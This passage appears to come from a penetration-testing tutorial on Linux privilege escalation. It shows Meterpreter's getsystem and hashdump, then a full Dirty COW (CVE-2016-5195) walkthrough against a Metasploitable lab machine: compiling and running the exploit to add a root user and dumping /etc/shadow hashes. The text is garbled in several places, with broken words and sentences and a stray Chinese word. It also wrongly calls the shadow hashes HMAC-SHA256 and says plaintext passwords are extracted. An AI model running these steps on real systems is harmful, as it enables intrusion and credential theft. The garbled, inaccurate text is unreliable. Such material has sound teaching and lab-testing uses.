Linux doesn’t store plaintextpasswords. Instead, it stores an HMAC-SHA256 hash of the passwords in the file /etc/shadow.
The permissions on the /etc/shadow/ file indicate that only tand can read the file, and that only aroot user can write to it.
The tool is preinstalled on Kali Linux and allows you tocheck a system for vulnerabilities that might allow a privilegeescalation attack:
unix-privesc-check standardThe Meterpreter shell has similar functionality built in. You can use the command getsystem to search for and exploit possible privilege escalation vulnerabilities:
meterpreter > getsystemAfter you gain root privileges, run the Meterpreter moduleto extract the hashes from the system.
meterpreter > run hashdump举例: Performing a Dirty COW Privilege EscalationAttack
a kernel-level vulnerabilitynicknamed Dirty COW. The vulnerability (CVE-2016-5195) allows an attacker without root privileges to edit any file by exploiting a bug inhow the Linux kernelmanages memory.
uname -a to get the current version of Linux:
msfadmin@metasploitable:~$ whoami msfadmin msfadmin@metasploitable:~$ uname -a Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/LinuxWhen you have the server’s Linux version, use searchsploit to search for known vulnerabilities affecting that version:
kali@kali:~$ searchsploit Linux Kernel 2.6.24 ------------------------------------------------ ----------------------- Exploit Title | Path ------------------------------------------------ ----------------------- Linux Kernel (Solaris 10 / < 5.10 138888-01) - | solaris/local/15962.c Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc | linux/local/9844.py ... Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/se | linux/local/40847.cpp Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_P | linux/local/40838.c Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE | linux/local/40839.cSome exploits are more reliable than others. The Dirty COW PTRACE exploit works reliably on the Linux version running on the Metasploitable server. The code for the exploit is available on your Kali Linux virtual machine. Using searchsploit, supply the exploit number 40839.c, and use the -p option to find the path to the exploit code:
kali@kali:~$ searchsploit -p 40839 Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) URL: https://www.exploit-db.com/exploits/40839 Path: /usr/share/exploitdb/exploits/linux/local/40839.c File Type: C source, ASCII text, with CRLF line terminatorscopy the code onto the Metasploitable machine:
kali@kali:~/$ scp /usr/share/exploitdb/exploits/linux/local/40839.c msfadmin@192.168.1.101:~/Compile and execute the exploit:
msfadmin@metasploitable:~$ gcc -pthread 40839.c -o kernelexploit -lcryptNow run the exploit (kernelexploit). You’ll be prompted to create a new root user (firefart) and provide it with a password. I’ve chosen 147 here:
msfadmin@metasploitable:~$ ./kernelexploit /etc/passwd successfully backed up to /tmp/passwd.bak Please enter the new password: 147 Complete line: firefart:fibyOYsv7UnQ6:0:0:pwned:/root:/bin/bash mmap: b7fa7000 madvise 0 ptrace 0 Done! Check /etc/passwd to see if the new user was created. You can log in with the username 'firefart' and the password '147'.Switch to the newly created user with root privileges:
msfadmin@metasploitable:~$ su firefart Password:Now you should be able to read the /etc/shadow file containing the password hashes:
firefart@metasploitable:/home/msfadmin# cat /etc/shadow root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:999:7::: daemon:*:14684:0:999:7: bin:*:14684:0:999:7: sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:9999:7: ...The entry should contain the HMAC-SHA256 hash of the users’ passwords. You can If you succeed, you’ll have escalated your privileges and extacted the plaintext passwords for the system’s users.
Tools like spray allow you to test multiple passwords and connections simultaneously. However, these tools do unusual things and could generate security alerts, so you’ll want to be careful when using them